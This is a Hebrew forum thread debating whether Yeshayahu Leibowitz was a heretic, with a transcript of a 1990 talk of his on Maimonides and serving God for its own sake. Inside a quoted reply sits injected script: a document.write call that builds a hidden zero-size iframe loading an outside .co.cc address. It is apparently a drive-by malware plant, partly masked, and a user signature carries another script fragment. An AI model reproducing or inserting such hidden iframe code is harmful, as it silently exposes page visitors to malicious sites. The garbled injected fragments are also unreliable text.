בית פורומים עצור כאן חושבים

ישעיהו ליבוביץ--כופר או צדיק....???

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-22/7/2012 17:55 לינק ישיר 

ילד חכם יש לך קישור שמראה שאכן כך ליבוביץ סובר?

חוץ מזה תראה את הסרטון הזה (הובא לעיל) ותבין עד כמה ליבוביץ אפיקורס

דדווח על תוכן פוגעני

נשלח ב-23/7/2012 20:19 לינק ישיר 

כמה הערות.
א.
דבר על טיבו של השואל אשר פתח את השיחה שלנו. הוא אינו חוקר לומד ומחפש אמת. זו מונחת כבר בכיסו. פקפוקים אין לו. כמה מהר הוציא משפט על אדם וקבע 'הוא כופר!' כמה טוב שלא נעשה אינקוויזיטור. כמה מזדרז היה להעלות על המוקד את שאינם מדייקים לחשוב כמותו.
ואותם 'קדושי עליון' שהוא לומד אצלם, - מעניין היכן הוא אותו סולם שמעלה אותו מדי בקר לישיבה של מעלה ומחזירו לעת ערב הישר למיטתו, - ובכן, באשר לקדושי עליון שלו, ראוי שיברר אם גם חכמה יש בהם. קדושה וחכמה הם שני דברים שונים לחלוטין.

ב.
ליבוביץ. רובו של הדיון נסוב על האיש ודעותיו.
לפניכם דמות של אינטלקטואל. לא אנסה להגדיר כאן את המושג. אלא שהעולם התורני ממעט מאד מאד להוציא אינטלקטואלים משורותיו כיוון שהדבר עומד בניגוד לדרכו ושיטותיו, ולא יצא ממנו איש כזה בארץ בדורות האחרונים.
מלבד השכלתו המדעית, - היה רופא ובעל ששה דוקטוראטים במדעי הטבע, הרבה ללמוד ולעסוק במקצועות הרוח. היה גם העולך הראשון של האנציקלופדיה העברית המצוינת. [תתפלאו, גם אהב קולנוע, והשחקנית המוערכת על ידו היתה מריל סטריפ]. תלמוד למד יחד עם הנשיא שזר אצל הרב הנזיר בירושלים. שלש עשרה שנים קרא קריאה ראשונה את המורה נבוכים. לא שהתקשה בקריאה, אלא שחקר אותו ואת מקורותיו לעומק רב. כשאתם עוסקים בדעותיו של אדם חובה לבדוק מה היתה הספריה שלו. קריאה ברמבם דורשת הכרות מעמיקה עם הוגים ערביים כמו אבן רושד ואבן סינא, עם הוגים יווניים, אפלטון, אריסטו ופלוטינוס בראשם, וכמובן מאליו הכרות ממצה של המחשבה היהודית והפילוסופיה היהודית כפרק מיוחד בתוכה. הבעיה היא שחלק ניכר מאד מן הרשימה הזו אינו נמצא בספריות התורניות [אני יודע על כמה אנשי תורה המחזיקים מהם בביתם ולומדים אותם אבל הם מיעוט קטן ונחבא]. מלבדם הכיר מחשבת ימי הבינים והעת החדשה, ובמיוחד עסק בקאנט, אתגר קשה מאד מאד. כמה עלצתי לשמו דעת אחד הכותבים על שטחיותו של האיש ודעותיו.

ג.
הדבר הראשון המאפיין אינטלקטואל הוא הצורך להתמודד עם מישורי מחשבה ומציאות רבים שונים מורכבים ומתנגשים, ולנסות למצא איזה איזון, פיתרון אפשרי. כשאדם מצוי במישור אחד מסוים, אפשר שיחשוב בתמימות כי, הנה מצא את הדרך והשיג את האמת השלמה, כחברנו  המלומד אצל קדושי עליון. אבל, כאשר אדם מעמיק ללמוד ולחקור הוא מגלה כי האמת האפשרית לאדם היא תמיד תמיד חלקית ומלאת בעיות וסתירות, ותמיד נדרש לשלם איזה מחיר. יש הרבה מאד שאלות לשאול, הרבה מאד בעיות לחשוב עליהן, הרבה מחלוקות עולות. זה מצויין! זו עדות למחשבה פעילה וחוקרת. רק מתוך כך אפשר לברר דברים ולהתפתח. מקום הברור והדיון שם האמת. מתוך כל זה אני מבקש כי תלמדו לחשוב באופן רציני יותר על הדמות שלפניכם, ואל תמהרו להוציא משפט.

ד.
כפירות ומהפכות.
אצל הקתולים העניין פשוט. האפיפיור, אחר דיון במועצה, קובע דוגמה. הדוגמה מנסחת את הדעה הנכונה והאמתית. הדוגמה נאמרת אקס-קתדרה - מן הקתדרה, מה שנותן לה תוקף חסר טעות. מי שחושב אחרת הוא כופר. נקודה.
אנחנו, היהודים אין לנו דוגמות. לנו יש אוסף של פרושים ופרשנויות ודעות שונות ומשונות, הכל בערבוביה גדולה. תמימים קוראים ואינם משגיחים או שהם שומעים תרוצים, וחריפים יודעים. [אולי משום כך לא התפתחה אצלנו פילוסופיה משלנו. כאשר מישהו כותב ברור ומסודר, תיכף מתגלות כל מיני סטיות וכפירות.

ה.
ראיתי הסרטון של ליבוביץ העוסק במהפכה הגדולה של מעמד האישה. הוא מזכיר גישת היוונים, ואהי נבקש להביא סיפור בעניין. בשעתו קראתי מכתב כתוב יוונית על פפירוס ממצרים, כבר איני זוכר אם זמנה בסוף התקופה ההלניסטית או בימי שלטון הרומאים במצרים. על כל פנים היוונים הפ שכבה דומיננטית. יווני אחד נסע לאלכסנדריה והשאיר את אשתו ההרה בבית. הוא כותב לה מכתב [לא היה לו טלפון] להודיע שיאחר לשוב, ומוסיף כי אם תלד בן שתגדל אותו, ואם בת, שתשליך אותה במזבלה. ודאי, תועבה כזו לא עלתה בדעת יהודי. אבל עניין הנשים  עליו דיבר אני שלם עמו לגמרי. הוא מחייב תיקון גדול מאד אצלנו, וההסברים הנתנים אינם אלא תרוצים עלובים. אכן העולם משתנה שנויים גדולים מאד, ולא רק במעמד האישה. השינוי הרבה יותר מקיף ועמוק, אי אפשר לחמוק ממנו אלא בעצימת עינים, משמע בשקר פנימי.

ו.
מקוממת במיוחד היתה דעתו בדבר ההשפעה של הנאצים עלינו. היום, לאחר שפגשתי באנשים 'נורמטיביים' ושוחחתי אתם, מצאתי שיש בינינו אנשים ההרואים בנאצים מודל לחיקוי ומודים בכך בפה גלוי. ליבוביץ, כחוקר העוסק גם בתהליכים חברתיים והיסטוריים עמד על כך בשלב מוקדם מאד. תפקידו של אינטלקטואל להתריע ולהטריד  ולגרום לאנשים לצאת משאננותם ולפקפק באמיתות שלהם. היול חשים רבים בציבור כי אנחנו נעים לקראת סופה של רפובליקת ווימאר שלנו.
עודד

תוקן על ידי 932woland ב- 23/07/2012 20:24:18

דדווח על תוכן פוגעני

נשלח ב-23/7/2012 21:09 לינק ישיר 

עודד היקר

כתבת על החרדיות ויחסה לאינטלקטואלים:

"לא יצא ממנו איש כזה בארץ בדורות האחרונים".

ומה עם:

השרידי אש.
הגרי"ד סולוביצ'יק.
הרב ד"ר מיכאל אברהם.

ולא הזכרתי אישים בני זמננו כמו הרב רבינוביץ והרב שילת ממעלה אדומים, הרב שרלו, וכמסתבר עוד.

השתתפותי בשבועות האחרונים היתה ירודה מאד, וכעת רק ראיתי את דבריך וביקשתי להעיר כי חשתי נעלב בשם הדתיות והחרדיות. נכון שהחינוך שלנו, החרדי, מטעים, יותר מדי, דברים מסויימים שאינם מסייעים לפיתוח יכולות, אבל לא תמיד זה היה כך ויש יוצאי דופן, אולי גם בזכות חינוכם, שמצליחים לעלות. ואז סבורני שהמעלות של התכנים והמתודות שמיושמות בצורת הלימוד הישיבתי דווקא מקדמות הופעת אישים המשלבים תכונות יקרות אלו, ולא צריך להיות ישעיהו לייבוביץ שסוף סוף היה מחוץ לקונצנזוס, גם מתוך בחירתו ורצונו.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-24/7/2012 07:58 לינק ישיר 

עודד

ראשית, לשם שנוי נהניתי.

ושתי הערות שלמעשה אינן שייכות לנושא האשכול אבל כתבת אז אתייחס

1.       מעמד האישה. כשם שהכוונה הגמורה להקרבת יצחק אינה מהווה ציון דרך למוסר האנושי ה"נורמלי" ונכפתה על אברהם כבטוי לעבדות, כך ניתן להתיחס למעמד האישה. מה שכפוי עלינו בתוקף ההלכה כפוי, אבל אינו מהווה מורה דרך למה שאינו מוכרח על פיה (שוויון בהחלטות בבית, נהיגה ועוד רבות ולא כאן המקום למתוח את גבול האפליה, שלדעתי הוא די מצומצם). יתכן ובבוא מוסד מוסמך ישב זה ויתקן ההלכה בנושא כפי היכולת (ולא כל הרוצה ליטול את השם נוטל, גם בשם חכמת ההמון, וד"ל)

2.       סוגיות כמו לאומנות הינן בעיקר עניין של מינון. האם מדינה יכולה לחיות ללא קורטוב של לאומנות? זהוי הלוז על ידיו  היה נכון (וכמעט כל מי ששירת בשטחים חווה זאת, לפחות לפני שערל ליבו) אבל האם אתה חותם על המינון שלו?

דדווח על תוכן פוגעני

נשלח ב-24/7/2012 08:03 לינק ישיר 

עודד
תלמיד חכם הוא לא היה, סלפן דגול הוא כן היה והאריכו על זה באשכולות נוספים.
יהודי שמגדיר את עצמו כדתי ברמתו לא אמור להתפעל משחקנית (מי התיר לו לראות אותה?) ובוודאי שלא להצהיר שהוא נהנה מקריאת רומן פורנוגרפי. גם אם זה מוסרי לשיטתו, הייתי מפה ממנו שידע את דברי השו"ע בנידון.

דדווח על תוכן פוגעני

נשלח ב-24/7/2012 14:46 לינק ישיר 

לענ"ד ישעיהו ליבוביץ לא היה אינטלקטואל, וגם לא פילוסוף, אלא הוגה דעות חריף. דוגמאות לאינטלקטואלים יהודים בדורות האחרונים: מרטין בובר, אברהם יהושע השל, עמנואל לוינס, הרב יהודה ליאון אשכנזי (מניטו).

דדווח על תוכן פוגעני

נשלח ב-24/7/2012 16:16 לינק ישיר 

אשיב בקיצור נמרץ כי, א. הספריות המצויות בעולם התורני מעידות על המגמה. [בכוונתי לכתוב על כך בנפרד] ב. אדם, איש או אישה, אינו צריך לסבול עוולה מחפירה וביזוי משום שאין מוסד מתאים לשנוי החוק [באמת אין בו צורך] ובעיקר משום חסמים נפשיים ושלטוניים. במקום שאין תבונה באה מהפכה ומשנה את המציאות. ג. אין אדם זקור לרשיון שיתיר לו לראות סרט עם מריל סטריפ, ואין שום פסול בענין. להפך. היא שחקנית אופי מעולה. ד. אין שום פסול לשמוע שירת נשים, ולשלב, גברים ונשים, ידים ולצאת במחול. שהם מביאים שמחה ושלום ואחווה לעולם. הקיצוניות מביאה שינאה ועוולה ונבלה. 

* * * *
מצווה לשמה ושאינה לשמה.
אביא כאן תימלול מלא של הקלטת תשובתו של לייבוביץ למתדיינים על הנושא הזה ביום עיון.
הרוצה לקרא יקרא ויתרשם על פי דרכו. כמובן, אין צורך להסכים עם תוכן הדברים.
הדברים נאמרו בעל פה, באופן ספונטאני ללא כל הכנה. מילים מודגשות מציינות דיבור מודגש.
אין בדברים תוכן פוגע.

31.3.1990

ישעיהו לייבוביץ

מצוות לשמן ושלא לשמן - תשובה למשיגים

הנאה רבה נהנתי, הן מדברי ידידי אבי רביצקי, והן מדברי חברנו המנחה, אשר ביסודם של הדברים ... הסכימו אתי! ואני צריך לעשות מאמצים גדולים, כן, - אני אומר את זה בלי שמץ של אירוניה, - מאמצים גדולים בכדי לגלות במה הם בעצם חולקים עלי.

הלא הנושא שלנו, או הנושא שאני הצעתי אותו, ענין של 'לשמה ושלא לשמה' והרבה דברים שנאמרו כאן, וביניהם הרבה דברים גדולים וחשובים מאד מאד, ונכונים מאד מאד, לא רק דברי היו נכונים, זה מובן מאליו, כן, אבל גם הדברים האחרים שנאמרו כאן, היו ביניהם הרבה דברים גדולים וחשובים ונכונים מאד מאד, אבל לא התיחסו בדיוק לנושא שלנו. ולכן אני רוצה כאן להסתפק בשתי הערות.

קודם כל הענין הזה על הסיום הזה של 'מורה נבוכים', בענין 'חסד משפט וצדקה'.

הרמב'ם הקדים לאותו פרק נ'ד את פרק נ'ג, שבו הוא כותב בפרוש, כן, שכל הפרק הזה אינו אלא הקדמה לפרק שיבא אחריו, כן. ומה פרוש הדבר הזה? שמה שאמור בפרק נ'ד, כן, הסוף הוא איזה דרשה, כן, דרשה, [במובן ה-] לא מחקר, כן, אלא דרשה המופנת לאדם, כן, חנוכית, כן, שזה משור אחד. אבל המשור האמתי הוא אחר לגמרי.

הלא הרמב'ם מתיחס לפסוק הזה בירמיהו כפסוק המבטא את ענין של הכרת אלהים. ועכשיו לא נדבר מה באמת מתכוון ירמיהו הנביא. מה שהוא מתכוון לא קשה להבין את זה, אבל מה הכוונה שהרמב'ם מכניס בדבר הזה, כן: 'כה אמר השם: אל יתהלל חכם בחכמתו ואל יתהלל גבור בגבורתו ואל יתהלל עשיר בעשרו כי אם בזאת יתהלל המתהלל  השכל וידוע אותי כי אני השם עושה חסד משפט וצדקה בארץ, [כן,] ובאלה חפצתי'[1]. ובזה הוא גם אחר כך [מסכם] מסיים פרק נ'ד.

אבל פרק נ'ג הוא אומר לנו משהו, שפתאום נמצא משור אחר לגמרי. לכאורה, לפי הפשט, ויש להניח שזה באמת היתה כוונתו של ירמיהו הנביא, כן, אף על פי שלעולם אין אנחנו יכולים להגיד בודאות מה היתה כוונתו של נביא בדברים האמורים בשגב רב, כן. לכאורה הלא הרמב'ם יכול למצא בזה סתירה: 'בזאת יתהלל המתהלל השכל וידוע אותי' וידיעת השם זאת היא הכרה שאין לו תארים. אל תשכחו את הענין המרכזי הזה של כל התאולוגיה של הרמב'ם, כן. ובשיחות שהיו לנו היום בנסיבות אחרות כבר נגענו בדבר הזה, שגם התאר של יודע, כן, ורוצה, למעשה לא חל על אלהים כלל אם אנחנו משתמשים במונחים רצון וידיעה בקטגוריות אנושיות, כן. והנה פתאום, לכאורה, 'השכל וידוע אותי כי אני השם עושה חסד משפט וצדקה' - הפונקציות שאלהים ממלא בעולם. והרמב'ם מסביר:

'חסד' עבור האלהים זה לא מה שאנחנו קוראים 'חסד' ומבינים מושג חסד בינינו. זה עצם קיומה של המציאות. העובדה שיש מציאות זה חסד אלהי, שהרי המציאות היא קונטינגנטית, זאת אומרת, אין לזה שום משמעות מוסרית.

'משפט' - 'אני השם עושה חסד משפט'. 'משפט' זה הסיבתיות הקימת בקוסמוס. שכל דבר מתחייב מדבר אחר. כן. זאת אומרת, המונח 'משפט', כשהוא מיוחס לאלהים, גם כן אין לו שום תוכן אתי אלא תוכן אקזיסטנציאלי.

'צדקה' - שהחי מסוגל לפעול באופן ספונטני, מקרבו. נתנת לו היכולת הזאת שאיננה קימת בכל העולם הדומם.

בסוף פרק [נ]ד שהרמב'ם אומר, - וזה ממש דרוש, דרוש חנוכי, - על אלהים נאמר שהוא עושה 'חסד משפט וצדקה', המשמעות של הדבר הזה איננה חנוכית כלל וכלל, כן, היא אמונית טהורה, כן:

'חסד' - שיש מציאות.

'משפט' - שיש סיבתיות.

'צדקה' - שיש פעילות ספונטנית של החי.

אבל מאחר שאלהים נקרא בתארים אלה, לכן אתה חייב לפעול על פי התארים האלה באותו מובן שיש להם במציאות האנושית: שאתה תהיה איש מלא חסד, ותנהג במשפט, ותנהג בצדקה.

הנה כאן הדגמה נפלאה למה שאני קראתי  'שני המשורים' שבהם הרמב'ם מטפל באמונה. כי 'חסד משפט וצדקה' במשור אחד זה הוראות לאדם: להיות איש, כן, גומל חסד, כן, ועושה משפט, כן, ועושה צדקה. אבל משור אחר, 'חסד משפט וצדקה' זה העובדה שקיים עולם מפני שיש אלהים. וזה ההלכה הראשונה שבמשנה תורה: 'כל הנמצאים בשמים ובארץ ומה שביניהם לא נמצאו אלא מאמתת המצאו.' אני מעיר את תשומת לבכם [לרבי מאיר דורא[2]] )שבמשנה) שבהלכות יסודי התורה אין רמז לכך שהאלהים ברא את העולם, שזה גם כן רק פונקציה של אלהים, וכאן מדובר על הכרת אלהים מבחינת אלהותו ולא מבחינת הפונקציה. ולכן לא נאמר: 'כל הנמצאים בשמים ובארץ ומה שביניהם לא נמצאו אלא' משום שאלהים עשה אותם, אלא 'לא נמצאו אלא מאמתת המצאו'.

העולם קיים מפני שיש מציאות אמת וזה אלהים. ולא נאמר מאומה על איזה פונקציה שהוא ממלא.

ועכשיו, באותם הלכות יסודי התורה, וזה הערה שניה שלי, ובזה אני צריך לסיים, ארבע הפרקים הראשונים בהלכות יסודי התורה. אם כן, שנים מהם הם הפרקים המטפיסיים הגדולים. אמונת היחוד, וכאן היחוד באותו המובן שהרמב'ם מבין את היחוד, כן. שלילת התארים, וגם יסודות האנתרופולוגיה האנושית. האדם. האדם. מהו האדם? ומה זה נפש? כן, יש נפש שהיא עובדה ביולוגית והיא כמובן מתה יחד עם הגוף. אין אצל הרמב'ם השארות הנפש במובן הפופולרי. ויש נפש שזאת ההכרה שהאדם מגיע אליה: 'השכל הנקנה', כן, שהוא בודאי, הוא עצמו נצחי מפני שהוא אמת. הכרת האמת. כן. כן. כל זה יש בארבעת הפרקים, כן, בשני הפרקים הראשונים.

בשני הפרקים אשר באים אחריו הם קוסמולוגיה, תמונת העולם, כפי שהכירו אותה. תמונת העולם האריסטוטלית אפשר בשלשה שלבים: האריסטוטלית, הפתולמאית, כפי מה שהמתמטיקאים והפיזיקאים והאסטרונומיה הערבים הוסיפו עליה. ובכן, אלהים, האדם והעולם. ובכל ארבעת הפרקים האלה אין המילה 'ישראל' מופיעה. כל עולם האמונה הזה הוא אנושי ולא יהודי ספציפי. זה הנגוד התהומי שבין הרמב'ם ורבי יהודה הלוי.

אבל, כשאנחנו מגיעים לפרק החמשי, פתאום, - כמעט אי אפשר להמנע מלהשתמש במליצה הידועה: 'כרעם ביום בהיר', - אנחנו קוראים: כל בית ישראל מצווים על קדוש השם הגדול'. ובכן, כל מה שקדם לזה: הכרת אלהים, יחוד אלהים, שלילת התארים, שלילת הגשמות, הכרת מהות האדם, הכרת מהות נפש האדם, - זה בכלל לא דבר יהודי ספציפי. זה נועד לכל בני אדם. כמובן, רוב בני האדם אינם מקבלים את זה, אבל האמת היא שגם רוב היהודים אינם מקבלים את זה. אבל, על כל פנים, זה מתיחס לאדם באשר הוא אדם. ישראל קשור במצווה. הגוי איננו מצווה על קדוש השם. הגוי מצווה על הכרת אלהים, שכל הנמצאים בשמים ובארץ לא נמצאו אלא מאמתת המצאו, כן, ושהוא, כן, אינו גוף, ולא ישיגוהו משיגי הגוף, ואין בו שום דמיון כלל. הכרה זו מצווה כל האדם באשר הוא אדם, ואם הוא איננו מכיר את זה אז הוא בהמה בצורת אדם. אבל כל בית ישראל מצווים על קדוש השם הגדול. זהו היחוד שבאמונה של הרמב'ם, שכל הענין של האמונה היהודית הוא לא בזה שרק באמונה היהודית יש הכרת השם, אלא שיש בה המצווה של קדוש השם, שאיננה חלה על הגוי. הגוי לא מצווה על זה, ואין לדרוש את זה ממנו. הוא מגיע לרמתו האנושית אם הוא מכיר את אלהים במובן של שלילת עבודה זרה, וכולו וכולו.

ובכן ענין המצוות הוא דוקא ענין המרכזי אצל הרמב'ם. כל בית ישראל מצווים על [קדוש השם]. שני הפרקים האלה, פרק ה' ופרק ו', עוסקים בהגדרת המושג של [עבודת] של קדוש השם, כן, שמתחיל במובן המקובל של הדבר הזה, הרווח, היינו מסירת הנפש, מסירת החיים על קדוש השם, ואחר כך הוא מרחיב את הדבר הזה, שכל קיום המצוות לשמן! -  פה אנו חוזרים לנושא שלנו, - זאת אומרת, לא לשם קבלת שכר ולא מיראה מהעונש, זהו קדוש השם. קיום המצוות לשמם - זהו קדוש השם, ועל זה מצווים ישראל.

והמענין הוא, -בזה כבר לא אוכל להרחיב את הדבור, - שאחר כך, אחרי ששת הפרקים האלה, בא הפרק השביעי, העוסק בנבואה, ובפרק הזה שוב אין ישראל נזכרים. זהו הנגוד העמוק ביותר שבין הרמב'ם ובין יהודה הלוי. אצל רבי יהודה הלוי היחוד של ישראל הוא בזה שרק בקרב עם ישראל קמו נביאים, ואילו הרמב'ם פותח את פרק הנבואה במלים: 'מיסודי הדת לידע שהאל מנבא את בני אדם'. רבי יהודה הלוי כמובן היה כותב: 'מיסודי הדת לידע שהאל מנבא את', נו? 'את ישראל'.

ובכן זהו מה שיש לי להעיר. ואולי אסיים בספור של דבר אקטואלי שנוגע ממש בענין הזה של 'שכר ולא לשכר'.

לפני זמן מה, אישיות בקרבנו,[3] שהיא אישיות בעלת רמה גבוהה מאד מבחינה אינטלקטואלית ומבחינה מוסרית, אדם אשר גם מילא פונקציות חברתיות גדולות וחשובות. היום הוא כבר לאחר חייו הצבוריים, כן, אבל רמתו האינטלקטואלית והמוסרית ודאי לא נפגמה. והוא גם אדם שמכיר את היהדות יפה מאד מאד. שכמובן הוא למד הרבה תורה ויודע מה זה יהדות. והוא התבטא לפני זמן מה, באיזו הזדמנות, שאחרי אושביץ אבדה לו האמונה באלהים. תגובתי המידית היתה: 'משמע שאתה מעולם לא האמנת באלהים אלא אתה האמנת בעזרת אלהים, ואמונה זאת איכזבה [...כמובן. היא לא עזרה...]'. אבל זאת היא אמונה שלא לשמה. מי שמאמין באלהים איננו קושר את זה בכלל במושג של עזרת אלהים. מה זה? אלהים ממונה על כך לדאוג לי? אני יודע מי ממונה על כך לדאוג לי - יצחק שמיר. ]צחוק באולם[ לא, זה לא צחוק! זה תפקידו! הוא ממונה על שלומה ובטחונה של מדינת ישראל ושל עמה. ואינני נכנס עכשיו לויכוח אם הוא עושה את זה טוב או רע, כן, אבל זאת היא הפונקציה שלו. אלהים איננו ממונה על כך לדאוג לבני אדם או לדאוג לעם ישראל או לדאוג לי. כאן הקו המפריד בין אמונה לשמה ובין אמונה שלא לשמה. מי שאמונתו באלהים מתמצת בזה שהוא מאמין בעזרת אלהים, הוא בכלל איננו מאמין באלהים, הוא דואג לעצמו. וכל עולמו של הרמב'ם, כפי שהראתי לכם, שש מאות שנה אחריו, אותו עולם הישיבות, כן, של תלמוד תורה בליטא, כן, המיוצגות על ידי רב חיים מוולוז'ין,[4] הם בטוי לבני אדם המאמינים באלהים, [ולא] ואין קושרים את זה כלל במושג של עזרת אלהים.

אבל הרמב'ם בעצמו אמר, כן, אנחנו את זה קראנו, שהתורה התירה לבני אדם, - המילה הזאת היא כל כך מאלפת, - התורה התירה לבני אדם לעבוד את השם ולקיים את המצוות בתקוות שכר, ולהמנע מעברות מיראת העונש.[5] התורה התירה. זאת אומרת, התורה היא ליברלית מאד מאד, כן. היא מתחשבת בזה שלא כל אדם הוא כאברהם אבינו, - זה גם כן בטוי של הרמב'ם, - היא מתחשבת בזה. אבל אנחנו עוסקים כאן באמונה, ואני מפריד מאד מאד בין דיון באמונה ובין דיון בפסיכולוגיה של מאמינים, ושני הדברים האלה אינם חופפים כלל וכלל.

[1] ירמיהו ט' 22-23

[2] מה ענינו לכאן? ר' יצחק בן מאיר מדורא dueren פוסק אשכנזי. מת 1300 לערך.

[3] השופט העליון חיים כהן.

[4] ר' חיים בר' יצחק 1749-1821,תלמידו של הגר'א, מיסד ישיבת 'עץ חיים', כותב בספרו 'רוח חיים': 'שכר מצווה מצווה - כי שכר המצווה היא המצווה עצמה. ... [עושה המצוות] הוא עתה בעולם הבא, והוא מעשה ידי האדם עצמו ... והוא בגן עדן בחיי האדם ... והבן!'.

)מובאה שהביא לייבוביץ בהרצאתו על הנושא בראשית הערב).

[5] הרמב'ם, פירוש המשנה.

דדווח על תוכן פוגעני

נשלח ב-24/7/2012 18:45 לינק ישיר 

מיימוני כתב:
עודד היקר

ומה עם:

השרידי אש.
הגרי"ד סולוביצ'יק.
הרב ד"ר מיכאל אברהם.

ולא הזכרתי אישים בני זמננו כמו הרב רבינוביץ והרב שילת ממעלה אדומים, הרב שרלו, וכמסתבר עוד.
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

אלו יצאו מן החרדיות??.
או שהיה/יש להם איזה נקודות חיכוך עם החרדיות.

דדווח על תוכן פוגעני

נשלח ב-25/7/2012 22:45 לינק ישיר 

כתב תלמיד טועה:
סוגיות כמו לאומנות הינן בעיקר עניין של מינון. האם מדינה יכולה לחיות ללא קורטוב של לאומנות? זהוי הלוז על ידיו  היה נכון (וכמעט כל מי ששירת בשטחים חווה זאת, לפחות לפני שערל ליבו) אבל האם אתה חותם על המינון שלו?

מוטב הלבחין בין תחושות לאומיות של ציבור לבין תחושות לאומניות שבהן אני רואה שלילה.
ליבוביץ הבחין מוקדם מאד בתהליך ההיסטורי שיתפתח אצלנו. הוא לא היה היחיד. קרא למשל בכתביו של אוריאל טל. הבעיה של ליבוביץ לא היתה במינון, שהיה נכון לדעתי, אלא בנכונותו לצאת בבדיבור הישיר, ה'דוגרי', המתריס, שהוא מקומם מאד, וכוונתו הייתה לקומם ולעורר מחשבה חדשה. זו שליחות של איש רוח. אבל חשיבה מחודשת אינה אפשרית עוד אצל ערלי לב. 
המצב התפתח והתקדם בחומרתו. כתבתי קודם כי אנחנו מצויים היום בשלבים מתקדמים של רפובליקת ווימאר. כיוון שהרוב אינו יודע מה פשר המילים 'רפובליקת ווימאר', לא הוטרד מהן ודילג עליהן. לא סתם תמצא כאן דיון פורה בדבר הצורך להקים כעת את בית המקדש.
עודד
עודד

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > ישעיהו ליבוביץ--כופר או צדיק....???
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 27 28 29 סך הכל 29 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.